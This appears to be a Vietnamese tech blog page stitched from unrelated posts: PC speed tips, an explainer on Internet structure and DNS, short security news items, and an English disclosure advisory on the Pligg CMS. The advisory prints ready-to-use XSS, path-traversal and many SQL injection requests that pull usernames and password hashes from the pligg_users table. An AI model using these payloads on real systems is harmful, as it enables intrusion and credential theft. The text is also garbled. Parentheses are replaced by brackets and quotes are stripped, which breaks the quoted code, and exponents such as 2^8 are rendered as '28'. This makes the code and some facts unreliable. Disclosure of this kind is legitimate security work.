Assign IspDNS là gì

Hầu như người sử dụng laptop nào cũng đều thừa nhận, chiếc máy khởi động ngày càng ì ạch đến khó hiểu và thường xuyên treo máy. Mặc dù đã tải nhiều chương trình diệt virus, tình cảnh cũng không khá lên chút nào.

Nguyên nhân không chỉ do virus, còn hàng tá các nguyên nhân có thể bạn chưa biết và cách khắc phục hiệu quả.

Sau đây là một số thủ thuật để laptop của bạn chạy nhanh hơn.

1. Đơn giản nhất, chọn 1 hình nền có kích thước và dung lượng tương đối hoặc không dùng. Ảnh lớn sẽ làm chậm quá trình khởi động máy. Tiếp đến, dọn dẹp ngăn nắp các icon [biểu tượng chương trình] trên destop, giấu bớt hoặc xóa những thứ mà chẳng khi nào dùng đến. Đừng quên vào Control Panel, chọn Add hoặc Remove Programs để di dời

Nguồn: breakingnewsblog

những chương trình không quan trọng.

2. Có 1 nguyên nhân nữa nhưng rất ít người chú ý đó là Font chữ. Thật ra, quá nhiều Font chữ cũng là yếu tố khiến hoạt động của Win chậm chạp. Nếu không phải là dân chuyên thiết kế, bạn chỉ nên chọn những Font chuẩn thường dùng như Unicode, Vni.

3. Dùng Quick Launch [QL] thay cho Microsoft Office Shortcut bar [MOS] [nằm góc phải màn hình Windows]. Trước hết, tắt MOS bằng cách nhấn chuột phải vào nút đầu tiên, chọn Exit -> No. Kích hoạt QL lên bằng trỏ chuột trên đầu thanh Taskbar, giữ và kéo chuột để thanh Taskbar cao thêm 1 khoảng. Phía trên là QL và ở dưới là các ứng dụng thu nhỏ rất tiện. ứng dụng này giúp tiết kiệm thêm 2 giây nữa.

4. Nên chạy chương trình diệt virus định kỳ vào thời gian nghỉ trong ngày [buổi trưa, chiều]. Tránh để chương trình tự quét mỗi khi máy khởi động. Nguyên nhân khiến máy lề rề từ 2- 3 giây.

5. Nhớ lấy đĩa CD ra khỏi ổ sau khi sử dụng. Khi máy khởi động sẽ tự kích hoạt kiểm tra tổng thể những thứ có trong máy. Do vậy mất nhiều thời gian, nhất là với đĩa trầy xước. Đồng thời nhớ chỉnh thiết bị khởi động đầu tiên là ổ cứng để máy khỏi tốn thời gian kiểm tra đĩa CD, mạng, USB.

6. Tắt chức năng Error Report tự thông báo lỗi cho nhà sản xuất và chẳng mang lại ích lợi gì cho người dùng. Bấm chuột phải tại My Computer -> Properties -> Advanced -> Error Reporting -> Disable Error Reporting, kích bỏ hộp kiểm But notify me when critical error occur.

7. Nhấp Start -> Run trong hộp Open và gõ vào lệnh msconfig để mở cửa sổ System Configuration Unility. Trên thẻ Startup, đánh dấu bỏ hết hoặc từng phần chương trình không cần thiết: ICQ, Winzap, Winampa, msmgs, Ghost thường khởi động cùng lúc với Win. Mỗi thứ chậm 1 ít, cộng lại cũng đủ khiên bạn phát cáu.

8. Với máy liên tục chép, xóa các chương trình, thao tác sau không thể bỏ qua. Vào Start -> All programs -> Accessories-> System Tools -> Disk cleanup, xóa hết các file Temp Cũng trong mục System Tools, chọn Disk Defragmenter dồn đĩa để tránh việc phân mảnh quá nhiều trong ổ cứng để truy xuất dữ liệu nhanh hơn. Thời gian dồn đĩa có thể khá lâu nên tranh thủ những giờ nghỉ ngơi để thực hiện cho hiệu quả.

9. Laptop của bạn thường la cà ở cafe Wi-Fi hay lướt net mỗi ngày cũng nên tổng vệ sinh các file dữ liệu truy cập sau khi dùng. Nhấp chuột phải tại thanh công cụ. Vào Explore -> Local settings -> Histrory [xóa], Temp [xóa], Temporary Internet [xóa]. Cũng tại thanh công cụ chọn Properties -> Start Menu -> Customize -> Advanced -> Clear list -> Ok để xóa các địa chỉ đã truy cập. Tốc độ sẽ được cải thiện rất đáng kể.

Các thao tác trên nhằm giúp cho Win nhẹ gánh và sẽ hoạt động rất nhanh. Trường hợp bạn mua lại máy cũ thì tốt nhất là cài lại Win mới. Máy đã qua sử dụng, Win thường mắc rất nhiều lỗi: ứng dụng, virus Theo Xã hội Thông tin

Leave a Response »

Jeff Tyson

Một trong những thứ tuyệt vời nhất về Internet là không ai thực sự sở hữu được nó. Nó là một tập hợp [collection] các mạng mang tính toàn cầu, cả lớn và nhỏ. Các mạng này kết nối với nhau theo nhiều cách khác nhau để tạo thành một thực thể đơn nhất, cái mà chúng ta vẫn được biết đến với tên gọi Internet. Trong thực tế, tên này được xuất phát từ ý tưởng của các mạng kết nối chéo [interconnected networks], được lấy từ hai chữ này mà ra.

Từ những ngày đầu tiên được thành lập vào năm 1969, Internet đã phát triển lớn mạnh từ 4 hệ thống máy tính chủ đến hàng chục triệu chiếc như vậy. Mặc dù không ai sở hữu riêng Internet nhưng nó không có nghĩa nó không cần kiểm tra và duy trì dưới nhiều hình thức khác nhau. Internet Society, một nhóm phi lợi nhuận được thành lập vào năm 1992, đã giám sát việc hình thành các chính sách và giao thức để định nghĩa cách chúng ta sẽ sử dụng và tương tác với Internet như thế nào.

Trong bài này, chúng tôi sẽ giới thiệu cho các bạn những vấn đề cơ bản về cấu trúc của Internet. Bạn sẽ biết thêm được những vấn đề cơ bản về Hệ thống máy chủ tên miền [DNS], các điểm truy cập mạng [NAP] và các mạng xương sống. Tuy nhiên đầu tiên chúng tôi sẽ giới thiệu về cách kết nối máy tính của bạn với các máy tính khác như thế nào.

Internet: Kiến trúc mạng

Mỗi máy tính được kết nối với Internet đều được coi là một phần của mạng, thậm chí cả máy tính ở nhà của bạn. Ví dụ, bạn có thể sử dụng một modem và quay số để kết nối đến một Internet Service Provider [ISP]. Ở nơi làm việc, bạn có thể là một phần nằm trong mạng nội bộ Local Area Network [LAN] của công ty, nhưng bạn vẫn có thể kết nối với Internet bằng cách sử dụng một ISP mà công ty của bạn đã ký kết hợp đồng cung cấp dịch vụ này. Khi kết nối với ISP của mình thì bạn sẽ trở thành một phần trong mạng của họ. ISP sau đó có thể kết nối với một mạng lớn hơn và lại trở thành một phần của mạng đó. Internet đơn giản là mạng của các mạng [network of networks].

Hầu hết các công ty truyền thông lớn đều có các mạng xương sống chuyên dụng của chính họ để kết nối giữa các vùng địa lý khác nhau. Trong mỗi vùng này, các công ty có điểm hiện diện Point of Presence [POP]. POP là một địa điểm mà những người dùng nội bộ có thể truy cập vào mạng công ty thông qua một số điện thoại nội bộ hoặc đường truyền riêng. Thứ làm kinh ngạc ở đây là không có vấn đề kiểm soát mạng mà thay vì đó là một số mạng mức cao kết nối với nhau thông qua các Network Access Point [NAP].

Ví dụ về mạng Internet

Đây là một ví dụ. Hãy hình dung rằng công ty A là một ISP lớn. Trong mỗi một thành phố lớn, công ty A này đều có một POP. POP trong mỗi thành phố đều có các hệ thống đường truyền có kết nối modem để khách hành của ISP này có thể quay số tới. Công ty này lắp đặt các đường truyền bằng cáp quang từ một công ty điện thoại để kết nối các POP này với nhau.

Tiếp theo, công ty B cũng là một ISP. Công ty B xây dựng tòa nhà lớn trong các thành phố lớn và các tập đoàn nằm trên những máy chủ Internet của họ trong các tòa nhà này. Công ty B lớn đến nỗi nó có thể chạy chính các đường cáp quang của họ giữa các tòa nhà để chúng được kết nối với nhau.

Trong kịch bản này, tất cả các khách hành của công ty A có thể trao đổi với nhau và tất cả các khách hàng của công ty B cũng có thể trao đổi với nhau, nhưng vẫn chưa có cách nào để trao đổi giữa các khách hàng của hai công ty này với nhau. Chính vì vậy, Công ty A và Công ty B cùng có một thỏa thuận kết nối qua NAP trong các thành phố khác, khi đó lưu lượng giữa 2 công ty này được lưu thông giữa các mạng tại NAP.

Trong thực tế, có đến hàng tá các nhà cung cấp dịch vụ Internet lớn có kết nối với nhau tại các NAP trong nhiều thành phố khác nhau, và có đến hàng tỉ tỉ byte dữ liệu được truyền đi truyền lại giữa các mạng với nhau qua các NAP này. Internet chính là một collection các mạng công ty khổng lồ đã thỏa thuận kết nối với nhau tại các NAP. Theo cách này, mỗi một máy tính nằm trong Internet đều có khả năng kết nối được với nhau.

Chức năng của Router

Tất cả những mạng này đều dựa vào các NAP, mạng xương sống và các router để truyền thông với nhau. Ở đây có một vấn đề khó tin về quá trình một thông báo có thể rời một máy tính này và di chuyển hầu như khắp thế giới thông qua các mạng khác nhau, đến được một máy tính khác trong một lượng thời gian rất ngắn [tính theo phân số của giây].

Các Router chỉ ra nơi để gửi thông tin từ một máy tính này đến máy tính khác, chúng chính là các máy tính đặc biệt dùng để gửi thông báo của bạn đến được các đích theo hàng nghìn đường khác nhau. Một router có hai vấn đề tách biệt nhưng có liên quan với nhau:
Bảo đảm thông tin không đi vào những nơi không cần thiết và cần phải có một số lượng phân vùng lớn dữ liệu để tránh cản trở các kết nối của những địa chỉ không liên quan [những địa chỉ không phải là đích đến].
Bảo đảm cho các thông tin đến được đúng đích như dự định

Trong quá trình thực thi hai công việc này, các router còn có tác dụng trong việc giao tiếp giữa hai mạng máy tính tách biệt nhau. Nó sẽ nối hai mạng này với nhau, gửi các thông tin từ mạng này sang mạng kia và ngược lại. Bảo vệ các mạng, ngăn chặn lưu lượng trên một mạng không cần thiết tràn vào một mạng khác. Không quan tâm về số lượng các mạng được gắn kèm, hoạt động và chức năng cơ bản của các router hoàn toàn giống nhau. Internet là một mạng lớn được thiết lập từ hàng chục nghìn mạng nhỏ hơn nên sự sử dụng các router là tuyệt đối cần thiết.
Mạng xương sống

National Science Foundation [NSF] đã xây dựng một mạng xương sống tốc độ cao vào năm 1987. Mạng xương sống này có tên gọi NSFNET, nó là một đường trục T1 để kết nối 170 mạng nhỏ hơn với nhau và hoạt động với tốc độ 1,544 Mbps. IBM, MCI và Merit đã làm việc với NSF để tạo mạng xương sống và đã phát triển lên các hệ thống đường trục T3 [45Mbps] những năm sau đó.

Mạng xương sống điển hình là các đường trục cáp quang. Các đường trục này có nhiều cáp quang được kết hợp với nhau để tăng dung lượng. Cáp quang được thiết kế dưới các kiểu khác nhau dựa vào sóng mang quang học, chẳng hạn như OC-3, OC-12 hoặc OC-48. Đường OC-3 có khả năng truyền tải đến 155Mbps còn OC-48 có thể truyền tải 2.488 Mbps [2,488 Gbps]. So với modem 56K truyền thống thì bạn có thể thấy được tốc độ của mạng xương sống nhanh hơn cỡ nào.

Ngày nay có nhiều công ty hoạt động trên các mạng xương sống dung lượng cao của chính họ, tất cả các mạng này đều kết nối với các NAP trên toàn thế giới. Theo cách này, mọi người trên Internet dù bất cứ nơi đâu, họ và những gì công ty họ sử dụng đều có khả năng truyền thông với nhau. Toàn bộ Internet là một sự thỏa thuận khổng lồ giữa các công ty để truyền thông dễ dàng.

Giao thức Internet: Địa chỉ IP

Mỗi máy tính trên mạng đều có một số nhận diện duy nhất được gọi là địa chỉ IP. IP là tên được viết tắt của Internet Protocol, đây là một ngôn ngữ mà các máy tính sử dụng nhằm mục đích truyền thông với nhau trên Internet. Một giao thức chính là cách đã được định nghĩa từ trước mà ai đó muốn sử dụng một dịch vụ để truyền thông với dịch vụ đó. Ai đó ở đây có thể là một người, nhưng thường nó là một chương trình máy tính như trình duyệt web chẳng hạn.

Một địa chỉ IP điển hình có dạng:

216.27.61.137

Để làm cho nó dễ dàng hơn trong việc ghi nhớ, các địa chỉ IP được trình bày theo định dạng hệ thập phân giống như trên. Tuy nhiên các máy tính lại truyền thông theo dạng nhị phân. Hệ thập phân của địa chỉ IP trên sẽ được trình bày trong dạng nhị phân khi các máy tính làm việc:

11011000.00011011.00111101.10001001

Bốn số trong một địa chỉ IP được gọi là các bộ tám [octet], vì chúng được thể hiện bằng 8 số nhị phân. Nếu sử dụng tất cả các vị trí này cùng nhau thì bạn sẽ có 32 bit, đó là lý do tại sao các địa chỉ IP được gọi là các số 32 bit. Do một trong 8 vị trí này đều có hai trạng thái khác nhau [1 và 0], nên nó có thể thể hiện được 28 hay 256 sự kết hợp. Chính vì vậy mỗi octet có thể gồm các giá trị từ 0 đến 255. Sự kết hợp của 232 này bạn sẽ có được 4.294. 967.296 giá trị.

Trong số gần 4,3 tỉ sự kết hợp này có một vài giá trị nào đó bị hạn chế trong sử dụng, nó sẽ không như một địa chỉ IP điển hình. Ví dụ như, địa chỉ 0.0.0.0 được dành riêng cho mạng mặc định và địa chỉ 255.255.255.255 được sử dụng cho quảng bá.

Các octet thực hiện một mục đích khác với việc phân chia một cách đơn giản các số. Chúng được sử dụng để tạo các lớp địa chỉ IP có thể được gán cho một doanh nghiệp, chính phủ hoặc một thực thể nào đó dựa trên kích thước và nhu cầu. Các octet được chia thành hai phần: Phần Net và phần Host. Phần Net luôn chứa octet đầu. Nó được sử dụng để phân biệt mạng mà máy tính nằm trong đó. Host [đôi khi được nói đến như một Nút Node] để phân biệt các máy tính trong mạng với nhau. Phần Host luôn chứa các octet còn lại. Có 5 lớp IP cộng với các địa chỉ đặc biệt nào đó. Để tìm hiểu thêm về địa chỉ IP chúng tôi sẽ dành riêng một bài nào đó để chỉ cho các bạn rõ về địa chỉ IP là gì.

Giao thức Internet: Hệ thống tên miền [DNS]

Khi Internet ngay từ thủa sơ khai, nó đã xem xét đến một số lượng các máy tính nhỏ được kết nối với nhau bằng các modem và đường điện thoại. Bạn chỉ có thể tạo các kết nối bằng cách cung cấp địa chỉ IP của máy tính mà bạn muốn thiết lập một liên kết với nó. Ví dụ, một địa chỉ IP điển hình có thể là 216.27.22.162. Mọi thứ đều sẽ hoạt động tốt nếu chỉ có một vài host, tuy nhiên nó sẽ trở nên cồng kềnh và khó nhớ khi ngày càng nhiều hệ thống online.

Giải pháp đầu tiên để giải quyết vấn đề này là một file văn bản đơn giản được dùy trì bởi Network Information Center dùng để ánh xạ hóa các tên thành địa chỉ IP. Càng ngày văn bản này trở lên quá lớn trong việc quản lý. Năm 1983, Đại học Wisconsin đã tạo được Domain Name System [DNS], để ánh xạ hóa các tên văn bản thành địa chỉ IP một cách tự động. Theo cách này, bạn chỉ cần nhớ đến tên miền //www.quantrimang.com thay vì phải nhớ địa chỉ IP của nó.

URL: Uniform Resource Locator

Khi bạn sử dụng Web hoặc gửi một email, bạn thường sử dụng tên miền để thực hiện điều đó. Ví dụ, Uniform Resource Locator [URL] //www.quantrimang.com” có chứa tên miền quantrimang.com. Mỗi lần sử dụng một tên miền, bạn sẽ dụng các máy chủ DNS của Internet để thông dịch tên miền mà con người có khả năng đọc thành các địa chỉ IP mã máy.

Các tên miền cấp 1, được gọi là tên miền mức đầu tiên bao gồm .COM, .ORG, .NET, .EDU và .GOV. Bên trong mỗi tên miền cấp 1 này lại có một danh sách lớn các miền cấp thứ hai. Ví dụ như trong miền mức đầu tiên .COM ở đây là: QuanTriMang.com

Mỗi một miền trong miền hàng đầu top-level .COM phải là duy nhất. Từ gần bên trái nhất và sau www, chính là tên host. Nó chỉ định tên của một máy nào đó [với địa chỉ IP cụ thể] trong một miền. Một miền nào đó được cho có thể gồm đến hàng triệu tên host miễn là chúng đều duy nhất bên trong miền đó.

Các máy chủ DNS chấp nhập yêu cầu từ các chương trình và máy chủ tên khác để chuyển đổi các tên miền thành địa chỉ IP. Khi một yêu cầu nào đó được đưa ra, máy chủ DNS có thể thực hiện một trong bốn thứ dưới đây:

1. Có thể trả lời yêu cầu cho một địa chỉ IP vì nó đã biết địa chỉ IP cho miền được yêu cầu.

2. Có thể liên lạc với máy chủ DNS khác và tìm ra địa chỉ IP cho tên đã được yêu cầu. Có thể phải thực hiện việc tìm kiếm này nhiều lần.

3. Nó có thể báo rằng: Không biết địa chỉ IP cho miền mà bạn yêu cầu nhưng đây là địa chỉ IP cho một máy chủ DNS mà nó biết.

4. Có thể trả về một thông báo lỗi vì tên miền yêu cầu không hợp lệ hay không tồn tại.

Một ví dụ về DNS

Hãy giả dụ rằng bạn đánh URL //www.quantrimang.com vào trình duyệt của mình. Trình duyệt sẽ liên lạc với DNS server để lấy về địa chỉ IP. DNS server sẽ bắt đầu công việc tìm kiếm địa chỉ IP của nó bằng cách liên lạc với một trong các máy chủ DNS gốc [root DNS server]. Các máy chủ gốc biết địa chỉ IP của tất cả các máy chủ DNS mà nó quản lý miền cấp 1 [COM, .NET, .ORG, ]. DNS server của bạn sẽ hỏi máy chủ gốc về //www.quantrimang.com, máy chủ gốc sẽ nói nó không biết địa chỉ IP cho //www.quantrimang.com nhưng đây là địa chỉ IP cho máy cho DNS .COM.

Sau đó máy chủ tên miền của bạn sẽ gửi một truy vấn đến máy chủ DNS .COM yêu cầu xem nó có biết địa chỉ IP cho //www.quantrimang.com hay không. Máy chủ DNS cho miền .COM biết các địa chỉ IP cho máy chủ tên miền đang quản lý miền //www.quantrimang.com, vì vậy nó gửi trả về các vấn đề được yêu cầu.

Máy chủ tên miền của bạn sẽ liên hệ với máy chủ DNS về //www.quantrimang.com và hỏi xem nó có biết địa chỉ IP cho //www.quantrimang.com hay không. Và ở đây máy chủ DNS về //www.quantrimang.com sẽ đáp trả địa chỉ IP cho máy chủ DNS của bạn, sau đó máy chủ DNS sẽ trả nó về trình duyệt, và có thể liên lạc với máy chủ về //www.quantrimang.com để lấy được nội dung của trang.

Một trong những khía cạnh làm cho những thao tác trên làm việc là có rất nhiều máy chủ DNS. Rất nhiều máy chủ DNS ở các mức, chính vì vậy nếu một máy chủ DNS nào đó bị lỗi thì vẫn có nhiều máy chủ khác quản lý các yêu cầu. Khía cạnh khác là việc lưu trữ. Khi một máy chủ DNS nào đó giải quyết một yêu cầu thì sẽ lưu địa chỉ IP mà nó nhận. Khi đã tạo một yêu cầu cho máy chủ DNS gốc về miền .COM thì nó sẽ biết địa chỉ IP cho máy chủ DNS đang quản lý miền .COM, vì vậy sẽ không bị rối với các máy chủ DNS gốc về các thông tin đó. Các máy chủ DNS có thể thực hiện nhiệm vụ này với mọi yêu cầu và việc lưu trữ này cũng giúp ích khi gặp một số vấn đề xảy ra.

Máy chủ [Server] và máy khách [Client] Internet

Tất cả các máy tính trên Internet đều là máy chủ hoặc máy khách. Tuy nhiên có sự phân biệt giữa chúng. Các máy tính có khả năng cung cấp dịch vụ cho các máy tính khác được gọi là máy chủ. Còn máy tính mà được sử dụng để kết nối đến các dịch vụ đó là máy khách. Có nhiều máy chủ Web, email server, FTP server và chính vì vậy nó mới có thể phục vụ được nhiều nhu cầu của tất cả người dùng trên toàn thế giới.

Khi bạn kết nối đến //www.quantrimang.com để đọc các trang thông tin, bạn sẽ là một người dùng đang dùng máy khách của mình đề truy cập vào máy chủ chứa nội dung trang này. Máy chủ tìm trang mà bạn yêu cầu và gửi nó đến cho bạn. Các máy khách truy cập vào máy chủ thực hiện như vậy với một ý định cụ thể, vì vậy các máy khách hướng yêu cầu của chúng đến một máy chủ phần mềm cụ thể đang chạy trên máy chủ. Ví dụ, nếu bạn đang chạy một trình duyệt web trên máy của mình, nó sẽ thông báo cho máy chủ Web trên máy chủ chứ không phải máy chủ email.

Một máy chủ có một địa chỉ IP tĩnh không thay đổi thường xuyên còn máy tính ở nhà của bạn khi thực hiện quay số hay ADSL qua một modem có địa chỉ IP thay đổi được gán bởi ISP mỗi lần kết nối. Địa chỉ IP đó là duy nhất với phiên làm việc hiện tại của bạn và có thể khác nhau trong những lần kết nối tiếp theo. Theo cách này, một ISP chỉ cần một địa chỉ IP cho mỗi một modem mà nó hỗ trợ chứ không phải mỗi một IP cho một khách hàng.

Các cổng và HTTP

Bất kỳ máy chủ nào cung cấp các dịch vụ có sẵn đều sử dụng các cổng có đánh số một trong những dịch vụ có sẵn trên máy chủ. Ví dụ, nếu một máy chủ đang chạy Web server và một máy chủ giao thức truyền tải file FTP, máy chủ Web sẽ có sẵn trên cổng 80, và máy chủ FTP sẽ có sẵn trên cổng 21. Các máy khách kết nối tới dịch vụ ở một địa chỉ IP nào đó và trên một số cổng cụ thể.

Khi một client kết nối với dịch vụ trên một cổng nào đó thì nó có thể truy cập vào dịch vụ bằng cách sử dụng một giao thức nào đó. Các giao thức thường là các văn bản và đơn giản mô tả cách client và máy chủ sẽ truyền thông với nhau như thế nào. Mọi Web server trên Internet đều thích nghi với giao thức hypertext transfer protocol [HTTP].

Các mạng, router, NAP, ISP, DNS và các máy chủ khác, tất cả làm cho Internet được hiện hữu. Hoàn toàn không ngạc nhiên khi bạn nhận ra rằng tất cả các thông tin này đều được gửi khắp thế giới trong một phần mili giây. Chúng là các thành phần rất quan trọng trong đời sống hiện đại, không có chúng sẽ không hề có Internet. Và không có Internet, đời sống sẽ rất khó khăn cho chúng ta.
Văn Linh [Theo How Stuff Work]

Leave a Response »

Description:
Pligg is a popular open source, full featured, content management
system written in php. There are a number of vulnerabilities
within Pligg that allow for remote file enumeration, file inclusion,
cross site scripting, and sql injection. When combined these issues
allow for remote code execution on the affected installation
via arbitrary php code placed within template files once admin
credentials are gained via SQL Injection.

Cross Site Scripting:
There are Cross Site Scripting issues in Pligg that allow for
theft of client side credentials such as cookies. An example
can be found in user.php. If the view parameter is set to
search then the keyword parameter can be influenced. This
is a result of un sanitized GPC variables being issued directly
to smarty via the assign function.

/user.php?view=search&keyword=alert[document.cookie];

The above example link would display the end users cookie to
them. Of course this can also be used to steal the cookie data
as mentioned earlier in this advisory.

Arbitrary File Access:
A number of file access issues exist in Pligg. They range from
the not so severe [such as arbitrary file enumeration] to the
much more severe [arbitrary file inclusion]. In regards to the
arbitrary file enumeration a good example of it can be found in
trackback.php @ line 76

$contents=@file_get_contents[$tb_url];
if[!$contents]
trackback_response[1,
$main_smarty->get_config_vars[PLIGG_Visual_Trackback_BadURL]];

The $tb_url variable gets its value directly from a post variable
as seen @ line 36, so, we can see how this can be easily used to
enumerate the existence of files on the web server both inside and
outside of the web accessible directories. If the file exists we will
get the PLIGG_Visual_Trackback_BadURL error. In addition to this
issue, an attacker may also include arbitrary files via a malformed
template request. Both template and language data within Pligg are
accepted via cookie input and are used in file handling operations
with no sanitation. The vulnerable code in question can be found in
config.php @ lines 65-68.

/settemplate.php?template=../LICENSE.txt%00

An easy way to see this issue in action is to set the malformed
template value via Pliggs settemplate.php script as seen above.
The above example will successfully include the LICENSE.txt file
that ships with the application by default.

SQL Injection:
There are a substantial number of SQL Injection issues within Pligg
that allow for an attacker to read any data from the underlying
database including user credentials. The first file we are going to
look at is vote.php

$link = new Link;
$link->id=$_POST[id];
$link->read_basic[];

The above code can be found @ lines 19-21 and shows Pligg setting the
internal class variable id with data from the $_POST super global.
Now lets have a look at the read_basic[] function within the Link
class to see what exactly is being done with id

// check to see if the link is cached
// if it is, use it
// if not, get from mysql and save to cache

if [isset[$cached_links[$id]] && $usecache == TRUE] {
$link = $cached_links[$id];
} else {
$link = $db->get_row[SELECT . table_links . .* FROM .
table_links . WHERE link_id = $id];
$cached_links[$id] = $link;
}

As you can see in the above code taken from /libs/link.php @ lines
200-209 the id variable is never sanitized before being used in a
query. The result is a highly exploitable SQL Injection vulnerability.

md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5,
6,concat[user_login,char[58],user_pass],8,9 FROM pligg_users /*

By sending a post request to vote.php with the above data an attacker
can successfully expose user credentials. Still, there are more SQL
Injection issues in Pligg, and next we will have a look at trackback.php

$trackres = new Trackback;
$trackres->link=$tb_id;
$trackres->type=in;
$trackres->url = $tb_url;
$dupe = $trackres->read[];

The above code comes from trackback.php @ lines 68-72, and like the
issue we previously discussed in regards to vote.php also sends
unsanitized gpc data to an internal class variable [in this case
$trackres->link] where it is used in an SQL Query without ever being
sanitized.

/trackback.php?id=007 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM pligg_users
WHERE user_id=1 AND MID[user_pass,1,1]=concat[char[97]] /*

A request like the one above made with the post method to trackback.php
and having the post contents of url=1&title=1&blog_name=1 can be used
to successfully enumerate database contents. In the example above Pligg
would return a We already have a ping from that URL for this post.
error if the first character of the first users password is a. Next
lets have a look at submit.php @ lines 320-321 and you will see another
SQL Injection issue very similar to these first two that I have discussed.
Another SQL Injection issue can be found in story.php @ lines 45 where
the requestTitle variable is used in a query with no sanitation.
Another SQL Injection issue can be found in recommend.php @ lines 19-25.
The SQL Injection issues in recommend.php are possible through both the
requestID and the requestTitle variables. Another SQL Injection issue
can be found in cloud.php @ lines 35-36 via the categoryID parameter.
Another SQL Injection issue can be found within out.php and is not much
different from the previously discussed SQL Injection issues in Pligg.

/out.php?title=-99%27 UNION SELECT 1 FROM pligg_users WHERE user_id=1 AND
MID[user_pass,1,1]=concat[char[97]]/*

The above url will allow an attacker to enumerate database data as
discussed earlier, and eventually gain admin credentials. Due to the large
number of SQL Injection issues in Pligg I will identify the remaining
issues with some simple examples of exploitation.

[ login.php ]
/* Post Request */
processlogin=3&username=-99 UNION SELECT
1,2,3,4,5,6,null,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/*

/* Get Request */
/login.php?processlogin=4&username=-99 UNION SELECT 1 FROM pligg_users
WHERE user_id=1/*&confirmationcode=1

[ cvote.php ]
/* Post Request */
id=-99 UNION SELECT 1,null,3,4,5,6,7,8,9 FROM pligg_users/*
&md5=d41d8cd98f00b204e9800998ecf8427e

[ edit.php ]-
/* Get Request */
/edit.php?id=1&commentid=-99 UNION SELECT 1 FROM pligg_users WHERE
user_id=1 AND MID[user_pass,1,1]=concat[char[49]]/*

Solution:
The Pligg developers are aware of the issues mentioned in this advisory
and an updated version of Pligg should be available from their website.
All users are encouraged to upgrade their Pligg installations as soon
as possible.

Leave a Response »

Một công cụ mã mở chuyên quét lỗi bảo mật các website bằng cách khai thác chức năng tìm kiếm của Google vừa được nhóm hacker The Cult of the Dead Cow phát hành mang tên Goolag.

The Cult of the Dead Cow cho biết Goolag được tạo ra với mục đích hỗ trợ các webmaster thử nghiệm mức độ bảo mật cơ bản cho website của mình và vá lỗi kịp thời.
Trong thế giới ngầm trên mạng hiện cũng có khá nhiều các công cụ quét lỗi [scanner] bảo mật miễn phí như Wikto Scanner nhưng danh tiếng đen của nhóm The Cult of the Dead Cow 10 năm về trước khi cho ra mắt Back Orifice [*] đã giúp Goolag trở nên phổ biến hơn.

Tôi không nghĩ có gì mới cả nhưng có thể nó giúp việc truy xuất khai thác hack từ Google dễ dàng hơn, Robert Hansen, CEO của Sectheory.com và nhà sáng lập blog bảo mật Ha.ckers.org, cho biết.

Đúng như Robert Hansen nhận định. Goolag tuy không mới nhưng cách thức sử dụng của nó đã trở nên dễ dàng hơn so với các công cụ quét lỗi trước đây. Không chỉ hacker mà ngay cả những người không am hiểu nhiều về kỹ thuật hacking vẫn có thể sử dụng được. Đây là một tín hiệu đáng lo cho giới bảo mật và phát triển website.

[*] Back Orifice: được xem như là một trojan với khả năng hỗ trợ tin tặc điều khiển từ xa một máy tính sử dụng hệ điều hành Windows.
Thanh Trực [Theo New4Hack, TTO]

Leave a Response »

Oracle Corp đang khẩn trương phát triển bản vá cho một lỗ hổng bảo mật cực kỳ nguy hiểm trong phần mềm máy chủ WebLogic bởi mã khai thác lỗi hiện đã được tung lên mạng Internet.

Minh chứng rõ ràng nhất cho mức độ nguy hiểm của lỗ hổng bảo mật WebLogic được phát hiện lần này chính là việc, hôm qua [29/7], Oracle đã phát hành bản tin cảnh báo khách hàng tình trạng khẩn cấp này.

Đây là lần đầu tiên trong 3 năm trở lại đây Oracle phát hành bản tin cảnh báo bảo mật lệch với thông lệ thường thấy.

Theo Oracle, lỗ hổng bảo mật nói trên phát sinh trong sản phẩm Oracle WebLogic Server và WebLogic Express hay còn được biết đến bằng tên gọi BEA WebLogic. Đây đều là hai ứng dụng dành cho máy chủ.

Eric Maurice Chuyên gia hàng đầu của Oracle cho biết nếu khai thác thành công lỗi này tin tặc có thể đăng nhập được vào máy chủ WebLogic mà không cần đến bất kỳ tài khoản người dùng nào, cho phép chúng chiếm được quyền điều khiển máy chủ WebLogic đó.

Lỗi này được đánh giá vào mức 10 điểm mức điểm cao nhất trên thang bậc đánh giá mức độ nguy hiểm lỗi bảo mật CVSS của Oracle.

Oracle khuyến cáo các nhà quản trị nên áp dụng giải pháp hạn chế tạm thời của hãng trong thời gian chờ đợi bản sửa lỗi. Các nhà quản trị có thể tìm thấy hướng dẫn chi tiết tại đây.

Chúng tôi sẽ cố gắng để phát hành bản sửa lỗi trong thời gian sớm nhất, ông Maurice khẳng định.

Trong khi đó, mã khai thác lỗi trên đây đã được tung lên mạng Internet từ ngày 15/7. Bản thân người phát tán lỗi cũng không hề gửi bất kỳ thông tin nào cảnh báo Oracle về lỗi này.
Theo VnMedia [Computerworld, PC World]

Leave a Response »

Các bản vá được phát hành vào đầu tháng này nhằm vá một lỗi nghiêm trọng trong Domain Name System [DNS] đã làm xuất hiện một vấn đề đó là, làm chậm các máy chủ chạy BIND, đây là phần mềm DNS phổ biến nhất của Internet và làm tê liệt một số hệ thống đang sử dụng Windows Server.

Paul Vixie, người đứng đầu nhóm Internet Systems Consortium [ISC], một nhóm chịu trách nhiệm cho phần mềm BIND [Berkeley Internet Name Domain], đã cho biết rằng, có một số vấn đề đối với bản vá lỗi trong ngày 8 tháng 7 vừa qua, bản vá lỗi được đưa ra như một phần của nâng cấp nhằm vá lại một lỗi đã được phát hiện từ nhiều tháng trước.

Trong suốt chu trình phát triển sản phẩm, chúng tôi đã thấy được vấn đề về hiệu suất trên các máy chủ đệ quy có lưu lượng cao, vấn đề được xác định ở đây khi bạn quan sát một số lượng lớn các truy vấn [khoảng hơn 10.000 truy vấn trên giây], Vixie đã nói vậy trong một thông báo gửi đến BIND mailing list vào hôm thứ Hai. Với khung thời gian bị hạn chế và các rủi ro liên quan, chúng tôi phải chọn giải pháp dừng các bản vá ASAP và chuyển công việc của mình sang các phát hành kế tiếp nhắm đến các vấn đề hiệu suất của máy chủ.

Mục tiêu trước mắt của chúng tôi là công bố các bản vá đến người dùng sớm nhất càng tốt, Vixie giải thích như vậy.

